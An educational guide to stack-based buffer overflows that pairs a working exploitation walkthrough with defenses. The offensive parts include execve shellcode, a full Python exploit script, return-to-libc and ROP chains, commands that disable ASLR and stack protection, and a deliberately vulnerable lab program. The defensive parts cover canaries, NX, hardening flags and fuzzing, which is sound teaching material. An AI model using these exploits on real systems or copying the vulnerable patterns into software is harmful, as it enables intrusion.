Stack-Based Buffer Overflows

Understanding stack-based buffer overflows: how they work, exploitation techniques, and defensive measures.

Introduction to Stack-Based Buffer Overflows

Stack-based buffer overflows are one of the oldest and most studied classes of software vulnerability. Although the mechanism has been understood for decades, they still appear in modern software because so much of it is written in memory-unsafe languages such as C and C++. This guide covers how they work, how they are exploited, and how to defend against them.

Understanding the Stack

Stack Fundamentals

The stack is a region of memory used for:

Local variables: Function-scoped variables
Function parameters: Arguments passed to functions
Return addresses: Where to continue execution after function calls
Saved registers: Preserved CPU state

Stack Layout (x86)

The stack grows downward (toward lower memory addresses):

Higher Memory Addresses
┌─────────────────────┐
│   Function Args     │ ← [ebp + 8], [ebp + 0xC], etc.
├─────────────────────┤
│   Return Address    │ ← [ebp + 4]
├─────────────────────┤
│   Saved EBP         │ ← [ebp] (frame pointer)
├─────────────────────┤
│   Local Variable 1  │ ← [ebp - 4]
├─────────────────────┤
│   Local Variable 2  │ ← [ebp - 8]
├─────────────────────┤
│      Buffer         │ ← [ebp - 0x108] (vulnerable buffer)
└─────────────────────┘
Lower Memory Addresses
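
The offsets in the diagram translate directly into the distance an overflow has to cover. A minimal sketch of that arithmetic, assuming the 32-bit frame shown above (the constant and function names are illustrative, not taken from any tool):

```python
# Offsets relative to EBP, taken from the stack diagram above (32-bit x86).
BUFFER_OFFSET = -0x108   # buffer starts at [ebp - 0x108]
SAVED_EBP_OFFSET = 0     # saved frame pointer at [ebp]
RETURN_ADDR_OFFSET = 4   # return address at [ebp + 4]


def distance_from_buffer(target_offset: int) -> int:
    """Bytes between the start of the buffer and a slot in the frame."""
    return target_offset - BUFFER_OFFSET


print(distance_from_buffer(SAVED_EBP_OFFSET))    # 264
print(distance_from_buffer(RETURN_ADDR_OFFSET))  # 268
```

The 268-byte figure is the padding length used in the exploitation examples later in this guide.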

Vulnerable Code Patterns

Classic Example

#include <stdio.h>
#include <string.h>
void vulnerable_function(char* input) {
    char buffer[256];           // Fixed-size buffer
    strcpy(buffer, input);      // No bounds checking!
    printf("You entered: %s\n", buffer);
}
int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

Dangerous Functions

Common functions that can cause buffer overflows:

Function	Risk	Safer Alternative
`strcpy()`	No bounds checking	`strlcpy()`, or `strncpy()` plus explicit NUL termination
`strcat()`	No bounds checking	`strlcat()`, or `strncat()` limited to the remaining space
`sprintf()`	No bounds checking	`snprintf()`
`gets()`	Cannot check bounds (removed in C11)	`fgets()`
`scanf("%s")`	No bounds checking	`scanf("%255s")` (width = buffer size - 1)
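
As a rough illustration of how the table can be applied to a code base, the sketch below flags calls to the unbounded functions by name. It is a hypothetical helper, far cruder than a real scanner: it does not understand comments, strings, or macros, and it leaves out `scanf("%s")` because that needs format-string inspection.

```python
import re

# Function names from the table above; the scanner itself is a hypothetical helper.
RISKY_CALLS = ("strcpy", "strcat", "sprintf", "gets")
CALL_PATTERN = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return (line_number, function_name) for each risky call found."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for match in CALL_PATTERN.finditer(line):
            hits.append((number, match.group(1)))
    return hits


sample = 'char buffer[256];\nstrcpy(buffer, input);\nsnprintf(out, sizeof(out), "%s", buffer);\n'
print(find_risky_calls(sample))  # [(2, 'strcpy')]
```

The word boundary in the pattern keeps `fgets` and `snprintf` from matching, so only the unbounded variants are reported.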

Buffer Overflow Mechanics

Normal Function Execution

void function(char* input) {
    char buffer[8];     // 8-byte buffer
    strcpy(buffer, input);
}
// Normal input: "HELLO" (5 characters + NUL terminator = 6 bytes written)
Memory Layout:
[buffer: "HELLO\x00" + 2 unused bytes] [saved ebp] [return addr] [args...]

Buffer Overflow Condition

// Overflow input: "AAAAAAAABBBBCCCCDDDD"
Memory Layout:
[buffer: "AAAAAAAA"] [saved ebp: "BBBB"] [return addr: "CCCC"] [args: "DDDD"]
                                                    ↑
                                            Overwritten return address!
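
The two layouts can be reproduced with a toy model of the frame. This is a simulation under simplifying assumptions (an 8-byte buffer followed directly by saved EBP and the return address, with made-up saved values), not a trace of a real process:

```python
import struct

# Toy model of the frame: 8-byte buffer, saved EBP, return address (32-bit).
BUFFER_SIZE = 8


def make_frame() -> bytearray:
    frame = bytearray(BUFFER_SIZE)                 # buffer
    frame += struct.pack("<I", 0xBFFFF7A8)         # saved EBP (made-up value)
    frame += struct.pack("<I", 0x08048456)         # return address (made-up value)
    return frame


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic strcpy: copy every byte plus a NUL, ignoring the buffer size."""
    copied = data + b"\x00"
    if len(copied) > len(frame):
        # Model the memory beyond the return address (the argument area).
        frame.extend(bytes(len(copied) - len(frame)))
    frame[0:len(copied)] = copied


def return_address(frame: bytearray) -> int:
    return struct.unpack_from("<I", frame, BUFFER_SIZE + 4)[0]


frame = make_frame()
unchecked_copy(frame, b"HELLO")
print(hex(return_address(frame)))   # 0x8048456, untouched

frame = make_frame()
unchecked_copy(frame, b"AAAAAAAABBBBCCCCDDDD")
print(hex(return_address(frame)))   # 0x43434343, i.e. "CCCC"
```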

Assembly Analysis

Let's examine the assembly code for our vulnerable function:

vulnerable_function:
    push   ebp              ; Save caller's frame pointer
    mov    ebp, esp         ; Set up new frame
    sub    esp, 0x118       ; Reserve 280 bytes: buffer, padding, outgoing arguments
    mov    eax, [ebp+8]     ; Load the input pointer (first parameter)
    mov    [esp+4], eax     ; strcpy source (second argument)
    lea    eax, [ebp-0x108] ; Address of buffer, 264 bytes below saved EBP
    mov    [esp], eax       ; strcpy destination (first argument)
    call   strcpy           ; Vulnerable call: copies until the first NUL byte
    ; ... printf call omitted ...
    mov    esp, ebp         ; Restore stack pointer
    pop    ebp              ; Restore frame pointer
    ret                     ; Return (potentially to attacker-controlled address)

Exploitation Techniques

Control Flow Hijacking

The primary goal is to overwrite the return address:

Step 1: Find the Offset

# Fill up to the expected return-address slot, then add a recognizable 4-byte marker
python -c "print('A' * 268 + 'BCDE')" > payload.txt
# Run under debugger
gdb ./vulnerable
(gdb) run $(cat payload.txt)
# Check EIP value after the crash
(gdb) info registers eip
eip            0x45444342          0x45444342   # "BCDE" in little-endian
# The return address sits 268 bytes past the start of the buffer (264 to saved EBP + 4)
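
Reading the marker back out of EIP is a byte-order exercise. A small sketch, assuming a 32-bit little-endian target as in the session above (the helper names are made up for illustration):

```python
import struct


def eip_to_marker(eip: int) -> bytes:
    """Return the 4 bytes as they appeared in the payload (little-endian)."""
    return struct.pack("<I", eip)


def marker_offset(payload: bytes, eip: int) -> int:
    """Offset of the bytes that ended up in EIP, or -1 if not present."""
    return payload.find(eip_to_marker(eip))


payload = b"A" * 268 + b"BCDE"
print(eip_to_marker(0x45444342))           # b'BCDE'
print(marker_offset(payload, 0x45444342))  # 268
```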

Step 2: Control Return Address

# Exploit payload structure (bytes literals keep each value a single raw byte in Python 3)
payload = b"A" * 268            # Padding to reach return address
payload += b"\xef\xbe\xad\xde"  # New return address (0xdeadbeef, little-endian)
# On return, the program jumps to 0xdeadbeef

Shellcode Injection

Inject and execute arbitrary code:

Simple Shellcode (Linux x86)

# execve("/bin//sh", ["/bin//sh", NULL], NULL) shellcode
shellcode = (
    b"\x31\xc0"             # xor eax, eax
    b"\x99"                 # cdq (edx = 0, so envp = NULL)
    b"\x50"                 # push eax (NUL terminator for the string)
    b"\x68\x2f\x2f\x73\x68" # push 0x68732f2f ("//sh")
    b"\x68\x2f\x62\x69\x6e" # push 0x6e69622f ("/bin")
    b"\x89\xe3"             # mov ebx, esp (ebx = path)
    b"\x50"                 # push eax (argv[1] = NULL)
    b"\x53"                 # push ebx (argv[0] = path)
    b"\x89\xe1"             # mov ecx, esp (ecx = argv)
    b"\xb0\x0b"             # mov al, 0xb (sys_execve)
    b"\xcd\x80"             # int 0x80
)
# Complete exploit
nop_sled = b"\x90" * 100     # NOP sled for reliability
padding = b"A" * (268 - len(nop_sled) - len(shellcode))
return_addr = b"\x10\xf0\xff\xbf"  # 0xbffff010: example address assumed to fall inside the NOP sled
exploit = nop_sled + shellcode + padding + return_addr

Return-to-libc Attack

When the stack is non-executable, return to existing functions:

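# Find function addresses
objdump -T /lib/libc.so.6 | grep system
objdump -T /lib/libc.so.6 | grep exit
# Find string "/bin/sh"
strings -a -t x /lib/libc.so.6 | grep "/bin/sh"
# Exploit payload (addresses are example values; real ones are the library load base plus the offsets found above)
padding = b"A" * 268
system_addr = b"\x60\xb7\xe4\xb7"  # Address of system()
exit_addr = b"\xe0\xeb\xe3\xb7"    # Address of exit(), used as system()'s return address
binsh_addr = b"\x0b\x8f\xf8\xb7"   # Address of "/bin/sh", system()'s first argument
exploit = padding + system_addr + exit_addr + binsh_addr
# No address may contain a \x00 byte: strcpy stops copying at the first NUL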
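
Because the overflow goes through `argv` and `strcpy`, certain byte values never reach the stack intact. The sketch below is one way to check a payload for them before use. The set of bad bytes is an assumption about this delivery path (a NUL ends the copy; whitespace splits an unquoted `$(...)` argument), and the helper name is hypothetical:

```python
import struct

# Bytes that end or split the input before it reaches the return address.
# NUL stops strcpy and cannot appear inside an argv string; whitespace is
# included on the assumption that the payload passes through an unquoted $(...).
BAD_BYTES = b"\x00\t\n "


def find_bad_bytes(payload: bytes, bad: bytes = BAD_BYTES) -> list[tuple[int, int]]:
    """Return (offset, byte_value) for every problematic byte in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


padding = b"A" * 268
ok = padding + struct.pack("<I", 0xB7E4B760)
truncated = padding + struct.pack("<I", 0xB7E49600)  # low byte is 0x00

print(find_bad_bytes(ok))         # []
print(find_bad_bytes(truncated))  # [(268, 0)]
```

An address such as 0xb7e49600 therefore cannot be delivered directly; the usual workarounds are to pick a different target a few bytes away or to use an input path that is length-based rather than NUL-terminated.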

Exploitation Tools and Techniques

Pattern Generation

# Using Metasploit pattern tools
./pattern_create.rb -l 300
# GDB PEDA
gdb-peda$ pattern create 300
gdb-peda$ pattern offset 0x41384141
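# Python script (Metasploit-style pattern: Aa0Aa1Aa2...)
import itertools
import string
def create_pattern(length):
    # Every 3-character group is distinct, unlike a repeating A-Z cycle,
    # whose 4-byte windows recur every 26 bytes and make offsets ambiguous
    groups = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    return "".join("".join(g) for g in groups)[:length]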
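
The lookup step that `pattern offset` performs can be sketched in a few lines. This version assumes a Metasploit-style pattern (uppercase, lowercase, digit triplets) and a 32-bit little-endian target; the function names are illustrative and it is not a reimplementation of either tool:

```python
import itertools
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern: Aa0Aa1Aa2... truncated to `length` bytes."""
    groups = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    text = "".join("".join(group) for group in groups)
    return text[:length].encode("ascii")


def pattern_offset(eip: int, length: int = 300) -> int:
    """Offset of the 4 bytes found in EIP within the pattern, or -1."""
    needle = struct.pack("<I", eip)   # undo the little-endian load
    return cyclic_pattern(length).find(needle)


pattern = cyclic_pattern(300)
fake_eip = struct.unpack("<I", pattern[268:272])[0]  # what a crash at offset 268 would load
print(pattern[:12])               # b'Aa0Aa1Aa2Aa3'
print(pattern_offset(fake_eip))   # 268
```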

Address Discovery

# Find function addresses in GDB
(gdb) print system
(gdb) print exit
(gdb) find 0xb7e00000, 0xb7f50000, "/bin/sh"
# Using ldd to find library base
ldd ./vulnerable
# Run with an empty environment so stack addresses stay the same from run to run
env - PWD=$PWD ./vulnerable $(python exploit.py)

Reliable Exploitation

#!/usr/bin/env python3
import struct
import subprocess
def exploit():
    # Null-free execve("/bin//sh") shellcode.
    # The payload is passed through argv and strcpy, so it must not
    # contain \x00 bytes.
    shellcode = (
        b"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
        b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    )
    # Build exploit
    ret_offset = 268             # Bytes from start of buffer to return address
    nop_sled = b"\x90" * 100
    # Calculate padding
    payload_size = len(nop_sled) + len(shellcode)
    padding = b"A" * (ret_offset - payload_size)
    # Return address: middle of the NOP sled.
    # 0xbffff000 is a placeholder for the buffer address seen in the debugger.
    buffer_addr = 0xbffff000
    ret_addr = struct.pack("<I", buffer_addr + len(nop_sled) // 2)
    payload = nop_sled + shellcode + padding + ret_addr
    assert b"\x00" not in payload, "NUL byte would truncate the copy"
    # Execute
    subprocess.call([b"./vulnerable", payload])
if __name__ == "__main__":
    exploit()

Defense Mechanisms

Stack Canaries

Compiler-inserted guards to detect stack corruption:

# Compile with stack protection
gcc -fstack-protector-all vulnerable.c -o vulnerable
# Generated assembly includes canary checks (x86-64 shown; 32-bit x86 reads the canary from gs:0x14)
function_start:
    mov    rax, QWORD PTR fs:0x28  ; Load canary
    mov    QWORD PTR [rbp-0x8], rax ; Store on stack
    ; ... function body ...
    mov    rax, QWORD PTR [rbp-0x8]  ; Load stored canary
    xor    rax, QWORD PTR fs:0x28    ; Compare with original
    je     .L2                       ; Jump if equal
    call   __stack_chk_fail          ; Abort if mismatch
.L2:
    leave
    ret
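
The prologue and epilogue logic can be modeled without assembly. The following is a simulation under simplifying assumptions (a 16-byte buffer immediately below the canary, made-up saved values), meant only to show why a linear overflow cannot reach the return address without changing the canary first:

```python
import secrets
import struct

BUFFER_SIZE = 16


def make_frame(canary: bytes) -> bytearray:
    """Toy 64-bit frame: buffer, canary, saved RBP, return address."""
    return bytearray(BUFFER_SIZE) + canary + struct.pack("<QQ", 0x7FFD0000, 0x401136)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Write data from the start of the buffer with no bounds check."""
    frame[0:len(data)] = data


def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """Epilogue check: compare the stored copy with the reference value."""
    return bytes(frame[BUFFER_SIZE:BUFFER_SIZE + 8]) == canary


canary = b"\x00" + secrets.token_bytes(7)   # glibc-style: low byte is NUL

frame = make_frame(canary)
unchecked_copy(frame, b"A" * 8)
print(canary_intact(frame, canary))    # True: write stayed inside the buffer

frame = make_frame(canary)
unchecked_copy(frame, b"A" * 40)
print(canary_intact(frame, canary))    # False: __stack_chk_fail would abort here
```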

Non-Executable Stack (NX/DEP)

Mark stack pages as non-executable:

# Compile with NX protection
gcc -Wl,-z,noexecstack vulnerable.c -o vulnerable
# Check the stack segment flags (RW = non-executable, RWE = executable); -W keeps each header on one line
readelf -lW vulnerable | grep GNU_STACK
# Runtime protection
execstack -q vulnerable    # Query
execstack -s vulnerable    # Set executable (disable protection)
execstack -c vulnerable    # Clear executable (enable protection)
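
The `GNU_STACK` check is easy to script. The sketch below parses text in the single-line layout that `readelf -lW` prints for program headers; the sample lines are modeled on typical output rather than captured from a specific binary, and the function name is hypothetical:

```python
def stack_is_executable(readelf_output: str) -> bool:
    """Inspect the GNU_STACK line of `readelf -lW` output for the E flag."""
    for line in readelf_output.splitlines():
        fields = line.split()
        if fields and fields[0] == "GNU_STACK":
            # Layout: type, offset, vaddr, paddr, filesz, memsz, flags..., align
            flags = "".join(fields[6:-1])
            return "E" in flags
    raise ValueError("no GNU_STACK program header found")


protected = "  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10"
unprotected = "  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10"
print(stack_is_executable(protected))    # False
print(stack_is_executable(unprotected))  # True
```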

Address Space Layout Randomization (ASLR)

# System-wide ASLR control
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space  # Disable
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space  # Conservative
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space  # Full
# Per-process ASLR
setarch x86_64 -R ./vulnerable  # Disable for this execution
# Check randomization
ldd ./vulnerable  # Run multiple times to see address changes
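
Stack randomization can be observed the same way by comparing the `[stack]` mapping between runs. A minimal sketch that parses text in the `/proc/<pid>/maps` format; the two snapshots are made-up examples standing in for two executions:

```python
def stack_range(maps_text: str) -> tuple[int, int]:
    """Return (start, end) of the [stack] mapping from /proc/<pid>/maps text."""
    for line in maps_text.splitlines():
        if line.rstrip().endswith("[stack]"):
            start, end = line.split()[0].split("-")
            return int(start, 16), int(end, 16)
    raise ValueError("no [stack] mapping found")


# Two made-up snapshots in the /proc/<pid>/maps format, standing in for two runs.
run1 = "7ffc3a1e2000-7ffc3a203000 rw-p 00000000 00:00 0                          [stack]"
run2 = "7ffe9c4b7000-7ffe9c4d8000 rw-p 00000000 00:00 0                          [stack]"
print(stack_range(run1) != stack_range(run2))   # True when ASLR is active
```

On a Linux system the same function can be fed `open("/proc/self/maps").read()`; with `randomize_va_space` set to 0 the range should stop changing between runs.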

Advanced Exploitation Techniques

Return-Oriented Programming (ROP)

Chain existing code snippets (gadgets) to bypass NX:

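# Find ROP gadgets
ROPgadget --binary ./vulnerable
# Example ROP chain (gadget addresses are illustrative)
import struct
gadget1 = 0x08048384  # pop eax; ret
gadget2 = 0x08048392  # pop ebx; ret
gadget3 = 0x080483a0  # int 0x80; ret
gadget4 = 0x080483b1  # pop ecx; pop edx; ret (hypothetical, needed to set argv and envp)
binsh_addr = 0xb7f88f0b   # Address of "/bin/sh"
padding = b"A" * 268
# Build ROP chain for execve("/bin/sh", NULL, NULL)
rop_chain = [
    gadget1,        # pop eax; ret
    0x0b,           # sys_execve
    gadget2,        # pop ebx; ret
    binsh_addr,     # "/bin/sh"
    gadget4,        # pop ecx; pop edx; ret
    0,              # ecx = argv = NULL
    0,              # edx = envp = NULL
    gadget3,        # int 0x80; ret
]
exploit = padding + b"".join(struct.pack("<I", addr) for addr in rop_chain)
# The constants 0x0b and 0 pack to bytes containing \x00, so this chain only survives
# length-based copies (read, memcpy); through strcpy they must be built with gadgets instead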

Bypassing Stack Canaries

Information leak: Read canary value before overwriting
Brute force: Guess canary byte by byte (forking servers)
Targeted overwrite: Corrupt local variables or pointers that sit below the canary, leaving the canary itself untouched
Exception handler: Overwrite SEH records on Windows
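
The byte-by-byte approach works because a forking server gives every child the same canary, so each byte can be confirmed independently. The simulation below illustrates only the counting argument; the oracle is a stand-in for "the child did not crash", and no real process is involved:

```python
import secrets

CANARY_SIZE = 4  # 32-bit canary


def make_oracle(canary: bytes):
    """Simulated forking server: every child shares the parent's canary.

    The oracle returns True (child survived) when the bytes written over
    the start of the canary match the real ones.
    """
    def survives(prefix: bytes) -> bool:
        return canary[:len(prefix)] == prefix
    return survives


def brute_force(survives) -> tuple[bytes, int]:
    """Recover the canary one byte at a time; return (canary, attempts)."""
    known = b""
    attempts = 0
    for _ in range(CANARY_SIZE):
        for guess in range(256):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
    return known, attempts


secret = secrets.token_bytes(CANARY_SIZE)
recovered, attempts = brute_force(make_oracle(secret))
print(recovered == secret, attempts <= CANARY_SIZE * 256)   # True True
```

At most 4 x 256 = 1024 attempts are needed, compared with up to 2^32 for guessing the whole value at once. This is why servers that re-execute rather than fork for each connection, and so get a fresh canary, are not exposed to this technique.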

ASLR Bypass Techniques

Information disclosure: Leak addresses from memory
Partial overwrite: Modify only lower address bytes
Return-to-PLT: Use procedure linkage table addresses, which stay fixed in non-PIE binaries
JIT spray: Control JIT compiler output
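
Information disclosure defeats ASLR because randomization shifts a whole library by one base value while the offsets inside it stay fixed. A sketch of the arithmetic, with made-up offsets and a hypothetical leaked address:

```python
def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Load base = runtime address of a symbol minus its offset in the file."""
    base = leaked_addr - symbol_offset
    if base % 0x1000 != 0:
        raise ValueError("base is not page-aligned; wrong symbol or library version")
    return base


def resolve(base: int, symbol_offset: int) -> int:
    """Runtime address of another symbol in the same library."""
    return base + symbol_offset


# Made-up numbers for illustration: offsets as `objdump -T` would report them.
PUTS_OFFSET = 0x67B40
SYSTEM_OFFSET = 0x3D200
leaked_puts = 0xB7E2AB40   # value disclosed at runtime (hypothetical)

base = libc_base(leaked_puts, PUTS_OFFSET)
print(hex(base))                            # 0xb7dc3000
print(hex(resolve(base, SYSTEM_OFFSET)))    # 0xb7e00200
```

The page-alignment check is a cheap sanity test: a base that is not a multiple of the page size usually means the offsets came from a different library build than the one loaded.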

Secure Coding Practices

Safe String Functions

// Instead of strcpy
char dest[256];
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';  // strncpy does not terminate on truncation
// Better: use strlcpy if available (BSD libc, glibc 2.38+)
strlcpy(dest, src, sizeof(dest));
// On older glibc systems, libbsd provides it
#include <bsd/string.h>  // BSD string functions; link with -lbsd

Input Validation

#include <string.h>
int safe_copy(char* dest, size_t dest_size, const char* src) {
    if (!dest || !src || dest_size == 0) {
        return -1;  // Invalid parameters
    }
    size_t src_len = strlen(src);
    if (src_len >= dest_size) {
        return -1;  // Source too large (no room for the terminator)
    }
    memcpy(dest, src, src_len + 1);  // Length already checked; copies the NUL too
    return 0;
}

Compiler Security Features

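# Recommended compilation flags:
#   -fstack-protector-strong    Stack canaries
#   -O2 -D_FORTIFY_SOURCE=2     Runtime checks (only active with optimization enabled)
#   -Wformat -Wformat-security  Format string warnings
#   -fPIE -pie                  Position independent executable
#   -Wl,-z,relro                Read-only relocations
#   -Wl,-z,now                  Immediate binding
#   -Wl,-z,noexecstack          Non-executable stack
gcc -fstack-protector-strong \
    -O2 -D_FORTIFY_SOURCE=2 \
    -Wformat -Wformat-security \
    -fPIE -pie \
    -Wl,-z,relro \
    -Wl,-z,now \
    -Wl,-z,noexecstack \
    program.c -o program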

Detection and Analysis

Static Analysis

# Flawfinder - scan for vulnerable functions
flawfinder vulnerable.c
# Cppcheck - static analysis
cppcheck --enable=all vulnerable.c
# Clang static analyzer
clang --analyze vulnerable.c

Dynamic Analysis

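# Valgrind memory error detection (Memcheck does not bounds-check stack arrays, so it may only report the resulting crash)
valgrind --tool=memcheck ./vulnerable input
# AddressSanitizer (reports a stack-buffer-overflow at the faulting write)
gcc -fsanitize=address -g vulnerable.c -o vulnerable
./vulnerable input
# GDB with the PEDA or GEF plugin loaded from ~/.gdbinit
gdb ./vulnerable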

Fuzzing

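# AFL++ fuzzing
afl-cc vulnerable.c -o vulnerable-afl
mkdir inputs outputs
echo "test" > inputs/seed
# @@ is replaced by the path of a mutated input file, so the target must read its
# input from that file (or from stdin without @@) rather than treat argv[1] as the data
afl-fuzz -i inputs -o outputs -- ./vulnerable-afl @@
# LibFuzzer: needs a harness that defines LLVMFuzzerTestOneInput instead of main()
# (harness.c is a hypothetical file that passes the fuzz data to vulnerable_function)
clang -fsanitize=fuzzer,address harness.c -o vulnerable-fuzz
./vulnerable-fuzz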
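
Before reaching for a coverage-guided fuzzer, a simple length probe often finds a stack overflow like the one in this guide. The sketch below is a naive probe, not a fuzzer: it grows the input one byte at a time and stops at the first crash. The `run` callback and the stand-in target are assumptions made so that the example runs without a compiled binary:

```python
from typing import Callable


def first_crashing_length(run: Callable[[bytes], int], max_len: int = 1024) -> int:
    """Feed inputs of growing length; return the first length that crashes.

    `run` executes the target with the given input and returns its exit
    status; negative values mean the process died from a signal, matching
    subprocess's returncode convention on POSIX.
    """
    for length in range(1, max_len + 1):
        if run(b"A" * length) < 0:
            return length
    return -1


def fake_target(data: bytes) -> int:
    """Stand-in for a real binary: 'segfaults' once input exceeds 76 bytes."""
    return -11 if len(data) > 76 else 0


print(first_crashing_length(fake_target))   # 77
```

Against a real program, `run` could wrap `subprocess.run([b"./vulnerable", data]).returncode`. The length at which the crash first appears is only a lower bound on the return-address offset, since smaller overflows may corrupt saved registers or padding without crashing.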

Real-World Examples

Historical Vulnerabilities

Morris Worm (1988): Exploited fingerd buffer overflow
Code Red (2001): IIS buffer overflow in indexing service
Slammer (2003): SQL Server buffer overflow
Conficker (2008): Windows Server Service buffer overflow

Modern Mitigations in Practice

Despite decades of awareness, buffer overflows still occur:

Legacy code: Old software with minimal security features
Embedded systems: Resource constraints limit protections
Kernel code: Lower-level code with fewer protections
Custom protocols: Network parsing code vulnerabilities

Hands-On Lab Exercise

Vulnerable Program

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret_function() {
    printf("Congratulations! You've gained control!\n");
    system("/bin/sh");
}
void vulnerable_function(char* input) {
    char buffer[64];
    printf("Buffer is at: %p\n", buffer);
    strcpy(buffer, input);
    printf("Input copied: %s\n", buffer);
}
int main(int argc, char* argv[]) {
    printf("Secret function is at: %p\n", (void*)secret_function);
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Program completed normally.\n");
    return 0;
}

Lab Tasks

Compile without protections: gcc -fno-stack-protector -z execstack -no-pie lab.c -o lab
Find the buffer overflow: Identify vulnerable function
Calculate offset: Determine bytes needed to overwrite return address
Redirect execution: Jump to secret_function
Enable protections: Recompile with security features and observe differences

Conclusion

Stack-based buffer overflows remain a critical vulnerability class that every security professional must understand. While modern defense mechanisms have significantly raised the bar for exploitation, they have not eliminated the threat entirely.

Key takeaways:

Understanding is crucial: Knowing how attacks work enables better defense
Defense in depth: Multiple protection layers are essential
Secure coding practices: Prevention is better than mitigation
Continuous vigilance: Security requires ongoing attention and updates
Evolution continues: Both attack and defense techniques constantly evolve

As software systems become more complex, the fundamental principles of memory safety become even more important. Whether you're a developer writing secure code, a security analyst hunting for vulnerabilities, or a system administrator implementing defenses, understanding buffer overflows provides essential knowledge for building and maintaining secure systems.

The techniques covered in this guide are a foundation for understanding both historical and modern exploitation methods and the defenses that evolved to counter them. Use this information ethically and only for legitimate security research and defense.